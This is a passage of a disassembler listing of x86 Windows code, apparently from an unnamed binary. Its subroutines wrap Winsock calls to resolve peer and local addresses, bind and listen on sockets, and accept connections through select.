jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: .text:0040740A�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: .text:004133C4�p
; .text:004161BF�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: .text:00414541�p
; .text:00416173�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call dword_41DE8C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: .text:004021E6�p
; .text:00403E29�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call ds:dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call ds:dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: .text:004022F0�p
; .text:00403E80�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: .text:00402237�p
; .text:00402321�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp dword_41DE38, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: .text:00413653�p
; .text:004143EA�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 200h
jbe short loc_404D21
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D21: ; CODE XREF: sub_404D10+B�j
push 1010h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404D39
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D39: ; CODE XREF: sub_404D10+23�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
locret_404D4B: ; CODE XREF: sub_404D10+F�j
; sub_404D10+27�j
leave
retn
sub_404D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4D proc near ; CODE XREF: .text:004138B3�p
; .text:004144B9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
cmp eax, [ecx]
jnz short loc_404D6A
push [ebp+arg_0]
call sub_4053B1
pop ecx
xor eax, eax
jmp short loc_404D99
; ---------------------------------------------------------------------------
loc_404D6A: ; CODE XREF: sub_404D4D+E�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ecx+eax*4+0Ch], edx
mov eax, [ebp+arg_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
xor edx, edx
cmp eax, [ecx]
setnz dl
mov eax, edx
loc_404D99: ; CODE XREF: sub_404D4D+1B�j
pop ebp
retn
sub_404D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D9B proc near ; CODE XREF: .text:004139AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404DAC
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404D9B:loc_404E18�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404DAC: ; CODE XREF: sub_404D9B+8�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short locret_404E1A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4+0Ch]
cmp eax, [ebp+arg_0]
jnz short loc_404E18
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+8]
jb short loc_404DDE
mov eax, [ebp+arg_4]
mov eax, [eax+8]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
loc_404DDE: ; CODE XREF: sub_404D9B+34�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
sub eax, [ebp+var_4]
shl eax, 2
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+10h]
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+0Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_4]
mov eax, [eax+4]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
jmp short locret_404E1A
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404D9B+29�j
jmp short loc_404DA5
; ---------------------------------------------------------------------------
locret_404E1A: ; CODE XREF: sub_404D9B+1A�j
; sub_404D9B+7B�j
leave
retn
sub_404D9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E1C proc near ; CODE XREF: .text:004138FB�p
; .text:004144FE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
and [ebp+var_8], 0
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E3A: ; CODE XREF: sub_404E1C+BD�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_404E41: ; CODE XREF: sub_404E1C+1C�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+4]
jnb loc_404EDE
loc_404E50: ; CODE XREF: sub_404E1C+B7�j
and [ebp+var_14], 0
jmp short loc_404E5D
; ---------------------------------------------------------------------------
loc_404E56: ; CODE XREF: sub_404E1C:loc_404E86�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_404E5D: ; CODE XREF: sub_404E1C+38�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnb short loc_404E88
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+810h]
cmp eax, [esi+edx*4+0Ch]
jnz short loc_404E86
jmp short loc_404E88
; ---------------------------------------------------------------------------
loc_404E86: ; CODE XREF: sub_404E1C+66�j
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E88: ; CODE XREF: sub_404E1C+4D�j
; sub_404E1C+68�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnz short loc_404ECF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+80Ch], 200h
jnb short loc_404ECF
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+0Ch]
mov [ecx+eax*4+810h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+80Ch]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+80Ch], eax
loc_404ECF: ; CODE XREF: sub_404E1C+78�j
; sub_404E1C+87�j
xor eax, eax
test eax, eax
jnz loc_404E50
jmp loc_404E3A
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E1C+2E�j
and [ebp+var_10], 0
mov [ebp+var_C], 3E8h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404F1A
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404F1A
mov [ebp+var_18], 1
